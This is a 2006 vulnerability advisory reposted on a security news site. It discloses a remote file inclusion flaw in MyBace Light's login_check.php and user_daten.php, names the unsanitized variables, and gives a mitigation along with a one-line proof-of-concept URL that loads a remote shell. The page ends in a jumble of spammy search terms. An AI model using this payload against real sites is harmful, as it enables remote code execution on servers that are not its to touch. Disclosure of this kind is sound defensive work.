about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive

exploits , vulnerabilities , articles , MyBace Light (login_check.php) Remote File Vulnerability



2006-09-01 MyBace Light (login_check.php) Remote File Vulnerability
Rated as : Moderate Risk

+--------------------------------------------------------------------
+
+ MyBace Light (hauptverzeichniss) Remote File Inclusion
+
+ Original advisory:
+
http://www.bb-pcsecurity.de/Websecurity/384/MyBace_Light_(hauptverzeichniss)_Remote_File_Inclusion.htm
+--------------------------------------------------------------------
+
+ Affected Software .: My Bace Light
+ Venedor ...........: http://www.onlinemacher.de/
+ Class .............: Remote File Inclusion
+ Risk ..............: high (Remote File Execution)
+ Found by ..........: Philipp Niedziela
+ Contact ...........: webmaster[at]bb-pcsecurity[.]de
+
+--------------------------------------------------------------------
+
+ Affected Files:
+  includes/login_check.php
+           var: $hauptverzeichniss
+
+  admin/login/content/user_daten.php
+           var: $template_back
+
+--------------------------------------------------------------------
+
+ $hauptverzeichniss & $template_back is not properly sanitized before
being used
+
+--------------------------------------------------------------------
+
+ Solution:
+ Deny direct access to these files using a .htaccess-file
+ or modify code:
+
+ if(!isset($_REQUEST['hauptverzeichniss']) &&
!isset($_GET['hauptverzeichniss'])
+     && !isset($_POST['hauptverzeichniss'])){
+ //code of org. *.php
+ }
+ else {
+ echo "You cannot access this file directly.";
+ die();
+ }
+
+--------------------------------------------------------------------
+
+ PoC:
+
+ http://[target]/includes/login_check.php?hauptverzeichniss=[shell]
+
+--------------------------------------------------------------------
+
+ Notice: I've tried to contact venedor 3 weeks ago, but no answer yet...
+
+
+ Greets: /str0ke
+
+-------------------------[ E O F ]----------------------------------
securitydot.net - 2006-09-01

Advertising

Copyright 2007, SecurityDot
Wed, 03 Dec 2008 08:52:31 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
200 /compo Free+dog+s hp LaserJe Www.indaya Www.Americ Watching putty.exe GRLS mambo Remo sexgaymoiv /search/ex 200 /compo sexxxnx 102030.tz gammaray mall.hoto7 pinchunter Image down Sexyvedo vd_openlda CMS is Fre Www.nudegi 200 /compo EUXTZHGZBG t715t Sexyvedo emma watso www.indian ibrahim ku www.daily sexy kiss www89 com hayfa wahb sexmalay Tigowap www.daily Cisco PIX sex news indiansexi nayan thar mambo Remo bia3x kar2 WWW.SHUKU //componen irani sex Indian sex actress se news for c Katrina po www.daily